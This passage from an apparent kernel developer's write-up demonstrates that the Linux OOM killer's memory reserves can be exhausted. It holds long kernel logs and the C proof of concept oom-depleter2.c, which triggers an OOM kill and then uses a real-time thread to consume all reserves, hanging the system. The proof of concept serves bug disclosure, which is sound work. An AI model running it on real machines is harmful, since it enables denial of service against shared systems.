all_unreclaimable? 
no [ 50.248718] lowmem_reserve[]: 0 0 0 0 [ 50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 50.248724] 2149 total pagecache pages [ 50.248725] 0 pages in swap cache [ 50.248725] Swap cache stats: add 0, delete 0, find 0/0 [ 50.248725] Free swap = 0kB [ 50.248726] Total swap = 0kB [ 50.248726] 524157 pages RAM [ 50.248726] 0 pages HighMem/MovableOnly [ 50.248726] 76583 pages reserved [ 50.248727] 0 pages hwpoisoned (...snipped...) [ 50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da [ 50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 50.248941] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f [ 50.248942] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000 [ 50.248942] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30 [ 50.248942] Call Trace: [ 50.248943] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 50.248944] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150 [ 50.248945] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930 [ 50.248946] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 50.248947] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 50.248948] [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0 [ 50.248949] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 50.248950] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 50.248951] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 50.248951] Mem-Info: [ 50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0 [ 50.248952] active_file:7 inactive_file:10 isolated_file:0 [ 50.248952] unevictable:0 dirty:0 writeback:0 unstable:0 [ 50.248952] slab_reclaimable:1689 slab_unreclaimable:5719 [ 50.248952] mapped:393 shmem:2146 pagetables:2097 bounce:0 [ 50.248952] free:0 free_pcp:21 free_cma:0 [ 50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no [ 50.248955] lowmem_reserve[]: 0 1731 1731 1731 [ 50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 50.248957] lowmem_reserve[]: 0 0 0 0 [ 50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 50.248962] 2149 total pagecache pages [ 50.248962] 0 pages in swap cache [ 50.248962] Swap cache stats: add 0, delete 0, find 0/0 [ 50.248962] Free swap = 0kB [ 50.248962] Total swap = 0kB [ 50.248963] 524157 pages RAM [ 50.248963] 0 pages HighMem/MovableOnly [ 50.248963] 76583 pages reserved [ 50.248963] 0 pages hwpoisoned [ 51.212857] Kill process 3940 (oom-depleter) sharing same memory (...snipped...) [ 52.299532] Kill process 4797 (oom-depleter) sharing same memory [ 85.966108] sysrq: SysRq : Show Memory [ 85.967079] Mem-Info: [ 85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0 [ 85.967643] active_file:0 inactive_file:1 isolated_file:0 [ 85.967643] unevictable:0 dirty:0 writeback:0 unstable:0 [ 85.967643] slab_reclaimable:1689 slab_unreclaimable:5401 [ 85.967643] mapped:391 shmem:2146 pagetables:2123 bounce:0 [ 85.967643] free:4 free_pcp:0 free_cma:0 [ 85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes [ 85.983232] lowmem_reserve[]: 0 1731 1731 1731 [ 85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 85.994326] lowmem_reserve[]: 0 0 0 0 [ 85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB [ 86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 86.003604] 2147 total pagecache pages [ 86.004878] 0 pages in swap cache [ 86.006083] Swap cache stats: add 0, delete 0, find 0/0 [ 86.007638] Free swap = 0kB [ 86.008793] Total swap = 0kB [ 86.009941] 524157 pages RAM [ 86.011089] 0 pages HighMem/MovableOnly [ 86.012413] 76583 pages reserved [ 86.013632] 0 pages hwpoisoned [ 125.269135] sysrq: SysRq : Show State [ 125.270536] task PC stack pid father [ 125.272269] systemd S ffff88007cc07a08 0 1 0 0x00000000 [ 125.274343] ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40 [ 125.276505] ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20 [ 125.278661] ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd [ 125.280844] Call Trace: [ 125.282076] [<ffffffff8161793e>] schedule+0x2e/0x70 [ 125.283698] [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0 [ 125.285481] [<ffffffff810be7c0>] ? cascade+0x90/0x90 [ 125.287131] [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0 [ 125.289038] [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240 [ 125.290955] [<ffffffff810a0870>] ? wait_woken+0x80/0x80 [ 125.292676] [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0 [ 125.294478] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930 [ 125.296401] [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0 [ 125.298283] [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100 [ 125.300141] [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0 [ 125.301977] [<ffffffff8110e728>] filemap_fault+0x218/0x490 [ 125.303759] [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60 [ 125.305576] [<ffffffff81132e69>] __do_fault+0x49/0xf0 [ 125.307273] [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960 [ 125.309100] [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0 [ 125.311114] [<ffffffff811badce>] ? ep_poll+0x11e/0x320 [ 125.312841] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 125.314643] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 125.316363] [<ffffffff8161c918>] page_fault+0x28/0x30 (...snipped...) [ 130.699717] oom-depleter x ffff88007c06bc28 0 3797 1 0x00000086 [ 130.701724] ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0 [ 130.703703] ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40 [ 130.705678] ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7 [ 130.707654] Call Trace: [ 130.708632] [<ffffffff8161793e>] schedule+0x2e/0x70 [ 130.710064] [<ffffffff8106b0d7>] do_exit+0x677/0xae0 [ 130.711535] [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0 [ 130.713037] [<ffffffff81074d4f>] get_signal+0x17f/0x540 [ 130.714537] [<ffffffff8100e302>] do_signal+0x32/0x650 [ 130.715991] [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0 [ 130.717545] [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0 [ 130.719275] [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0 [ 130.720973] [<ffffffff816173a4>] ? __schedule+0x274/0x7e0 [ 130.722536] [<ffffffff8161793e>] ? schedule+0x2e/0x70 [ 130.723989] [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f (...snipped...) 
[ 157.243284] oom-depleter R running task 0 4797 1 0x00000084 [ 157.245131] ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a [ 157.247105] ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d [ 157.249092] ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074 [ 157.251054] Call Trace: [ 157.252018] <IRQ> [<ffffffff8108d14a>] sched_show_task+0xaa/0x110 [ 157.253740] [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0 [ 157.255258] [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20 [ 157.256898] [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150 [ 157.258442] [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0 [ 157.259974] [<ffffffff81497c12>] input_to_handler+0x52/0x100 [ 157.261552] [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180 [ 157.263270] [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0 [ 157.264875] [<ffffffff81499f3e>] input_event+0x4e/0x70 [ 157.266366] [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0 [ 157.267929] [<ffffffff81495101>] serio_interrupt+0x41/0x80 [ 157.269457] [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0 [ 157.271017] [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100 [ 157.272678] [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60 [ 157.274224] [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140 [ 157.275759] [<ffffffff81010ad9>] handle_irq+0x19/0x30 [ 157.277187] [<ffffffff81010478>] do_IRQ+0x48/0xd0 [ 157.278563] [<ffffffff8161b8c7>] common_interrupt+0x87/0x87 [ 157.280091] <EOI> [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180 [ 157.282070] [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20 [ 157.283597] [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50 [ 157.285316] [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20 [ 157.286898] [<ffffffff8117d610>] super_cache_count+0x50/0xd0 [ 157.288477] [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280 [ 157.290087] [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0 [ 157.291595] [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420 [ 157.293242] [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0 [ 157.294799] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930 [ 157.296474] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 157.298019] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 157.299606] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0 [ 157.301131] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 157.302676] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 157.304169] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 157.305737] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 157.307186] [<ffffffff813124c0>] ? 
__clear_user+0x20/0x50 [ 157.308699] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250 [ 157.310210] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0 [ 157.311713] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0 [ 157.313155] [<ffffffff8117b489>] vfs_read+0x79/0x120 [ 157.314575] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0 [ 157.315980] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 157.317649] Showing busy workqueues and worker pools: [ 157.319070] workqueue events: flags=0x0 [ 157.320261] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256 [ 157.321980] pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn [ 157.324279] workqueue events_freezable: flags=0x4 [ 157.325652] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.327373] pending: vmballoon_work [vmw_balloon] [ 157.328859] workqueue events_power_efficient: flags=0x80 [ 157.330343] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.332067] pending: neigh_periodic_work [ 157.333431] workqueue events_freezable_power_: flags=0x84 [ 157.334941] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.336684] in-flight: 228:disk_events_workfn [ 157.338168] workqueue xfs-log/sda1: flags=0x14 [ 157.339473] pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256 [ 157.341255] in-flight: 1369:xfs_log_worker [ 157.342674] pending: xfs_buf_ioend_work [ 157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14 [ 157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27 [ 185.044658] sysrq: SysRq : Show Memory [ 185.045975] Mem-Info: [ 185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0 [ 185.046968] active_file:0 inactive_file:1 isolated_file:0 [ 185.046968] unevictable:0 dirty:0 writeback:0 unstable:0 [ 185.046968] slab_reclaimable:1689 slab_unreclaimable:5401 [ 185.046968] mapped:391 shmem:2146 pagetables:2123 bounce:0 [ 185.046968] free:4 free_pcp:0 free_cma:0 [ 185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes [ 185.066444] lowmem_reserve[]: 0 1731 1731 1731 [ 185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
no [ 185.079186] lowmem_reserve[]: 0 0 0 0 [ 185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB [ 185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 185.089572] 2147 total pagecache pages [ 185.091096] 0 pages in swap cache [ 185.092469] Swap cache stats: add 0, delete 0, find 0/0 [ 185.094288] Free swap = 0kB [ 185.095671] Total swap = 0kB [ 185.097075] 524157 pages RAM [ 185.098466] 0 pages HighMem/MovableOnly [ 185.100005] 76583 pages reserved [ 185.101435] 0 pages hwpoisoned [ 205.509157] sysrq: SysRq : Resetting ---------- Example output end ----------
Then, I was able to deplete the memory reserves using that time window. I next got a comment asking "what about sending the SIGKILL signal immediately after setting the TIF_MEMDIE flag?", so I again demonstrated that the result is the same, using a different approach.
---------- oom-depleter2.c start ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/klog.h>

static int zero_fd = -1;
static char *buf = NULL;
static unsigned long size = 0;

static int trigger(void *unused)
{
	{
		struct sched_param sp = { };
		sched_setscheduler(0, SCHED_IDLE, &sp);
	}
	read(zero_fd, buf, size); /* Will cause OOM due to overcommit */
	return 0;
}

int main(int argc, char *argv[])
{
	unsigned long i;
	zero_fd = open("/dev/zero", O_RDONLY);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	/* Let a child thread trigger the OOM killer. */
	clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
	{
		struct sched_param sp = { 99 };
		sched_setscheduler(0, SCHED_FIFO, &sp);
	}
	/* Wait until the OOM killer messages appear. */
	while (1) {
		i = klogctl(2, buf, size - 1);
		if (i > 0) {
			buf[i] = '\0';
			if (strstr(buf, "Killed process "))
				break;
		}
	}
	/* Deplete all memory reserve. */
	for (i = size; i; i -= 4096)
		buf[i - 1] = 1;
	return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter2.c end ----------
# taskset -c 0 ./oom-depleter2
---------- Example output start ---------- [ 47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 47.070651] oom-depleter2 cpuset=/ mems_allowed=0 [ 47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85 [ 47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 47.076583] 0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283 [ 47.078014] ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000 [ 47.079438] 0000000000000202 0000000000000018 0000000000000001 0000000000000202 [ 47.080856] Call Trace: [ 47.081335] [<ffffffff81313283>] dump_stack+0x4b/0x78 [ 47.082233] [<ffffffff8117ff7d>] dump_header+0x82/0x232 [ 47.083234] [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30 [ 47.084447] [<ffffffff810fe041>] ? delayacct_end+0x51/0x60 [ 47.085483] [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0 [ 47.086551] [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40 [ 47.087715] [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20 [ 47.088874] [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0 [ 47.089915] [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930 [ 47.091010] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0 [ 47.092042] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950 [ 47.093076] [<ffffffff816287cd>] ? retint_kernel+0x1b/0x1d [ 47.094108] [<ffffffff81628837>] ? native_iret+0x7/0x7 [ 47.095108] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440 [ 47.096109] [<ffffffff810568a0>] do_page_fault+0x30/0x80 [ 47.097052] [<ffffffff816297e8>] page_fault+0x28/0x30 [ 47.098544] [<ffffffff81320ae0>] ? __clear_user+0x20/0x50 [ 47.099651] [<ffffffff813254b8>] iov_iter_zero+0x68/0x250 [ 47.100642] [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0 [ 47.101701] [<ffffffff813f9018>] read_iter_zero+0x38/0xa0 [ 47.102754] [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0 [ 47.103684] [<ffffffff81184639>] vfs_read+0x79/0x120 [ 47.104630] [<ffffffff81185350>] SyS_read+0x50/0xc0 [ 47.105503] [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0 [ 47.106637] [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 47.109307] Mem-Info: [ 47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0 [ 47.109801] active_file:0 inactive_file:474 isolated_file:0 [ 47.109801] unevictable:0 dirty:0 writeback:0 unstable:0 [ 47.109801] slab_reclaimable:1114 slab_unreclaimable:3896 [ 47.109801] mapped:96 shmem:4188 pagetables:1014 bounce:0 [ 47.109801] free:12368 free_pcp:183 free_cma:0 [ 47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? 
yes [ 47.129538] lowmem_reserve[]: 0 1731 1731 1731 [ 47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no [ 47.143246] lowmem_reserve[]: 0 0 0 0 [ 47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB [ 47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB [ 47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 47.163987] 4649 total pagecache pages [ 47.166121] 0 pages in swap cache [ 47.168500] Swap cache stats: add 0, delete 0, find 0/0 [ 47.170238] Free swap = 0kB [ 47.171764] Total swap = 0kB [ 47.173270] 524157 pages RAM [ 47.174520] 0 pages HighMem/MovableOnly [ 47.175930] 76617 pages reserved [ 47.178043] 0 pages hwpoisoned [ 47.179584] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name [ 47.182065] [ 3820] 0 3820 10756 168 24 3 0 0 systemd-journal [ 47.184504] [ 3823] 0 3823 10262 101 23 3 0 -1000 systemd-udevd [ 47.186847] [ 3824] 0 3824 27503 33 12 3 0 0 agetty [ 47.189291] [ 3825] 0 3825 8673 84 23 3 0 0 systemd-logind [ 47.191691] [ 3826] 0 3826 21787 154 48 3 0 0 login [ 47.193959] [ 3828] 81 3828 6609 82 18 3 0 -900 dbus-daemon [ 47.196297] [ 3831] 0 3831 28878 93 15 3 0 0 bash [ 47.198573] [ 3850] 0 3850 541715 414661 820 6 0 0 oom-depleter2 [ 47.200915] [ 3851] 0 3851 541715 414661 820 6 0 0 oom-depleter2 [ 47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child [ 47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB [ 47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da [ 47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85 [ 47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 47.265184] 0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283 [ 47.267511] 00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000 [ 47.269815] ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf [ 47.272019] Call Trace: [ 47.273283] [<ffffffff81313283>] dump_stack+0x4b/0x78 [ 47.275081] [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150 [ 47.276962] [<ffffffff810a30cf>] ? 
__wake_up+0x3f/0x50 [ 47.278700] [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930 [ 47.280664] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0 [ 47.282422] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950 [ 47.284240] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440 [ 47.286036] [<ffffffff810568a0>] do_page_fault+0x30/0x80 [ 47.287693] [<ffffffff816297e8>] page_fault+0x28/0x30 [ 47.289358] Mem-Info: [ 47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0 [ 47.290494] active_file:0 inactive_file:0 isolated_file:0 [ 47.290494] unevictable:0 dirty:0 writeback:0 unstable:0 [ 47.290494] slab_reclaimable:1114 slab_unreclaimable:3896 [ 47.290494] mapped:96 shmem:4188 pagetables:1014 bounce:0 [ 47.290494] free:0 free_pcp:180 free_cma:0 [ 47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes [ 47.309430] lowmem_reserve[]: 0 1731 1731 1731 [ 47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes [ 47.321601] lowmem_reserve[]: 0 0 0 0 [ 47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 47.331385] 4189 total pagecache pages [ 47.332896] 0 pages in swap cache [ 47.334262] Swap cache stats: add 0, delete 0, find 0/0 [ 47.335990] Free swap = 0kB [ 47.337390] Total swap = 0kB [ 47.338656] 524157 pages RAM [ 47.339964] 0 pages HighMem/MovableOnly [ 47.341464] 76617 pages reserved [ 47.342808] 0 pages hwpoisoned (...snipped...) [ 93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 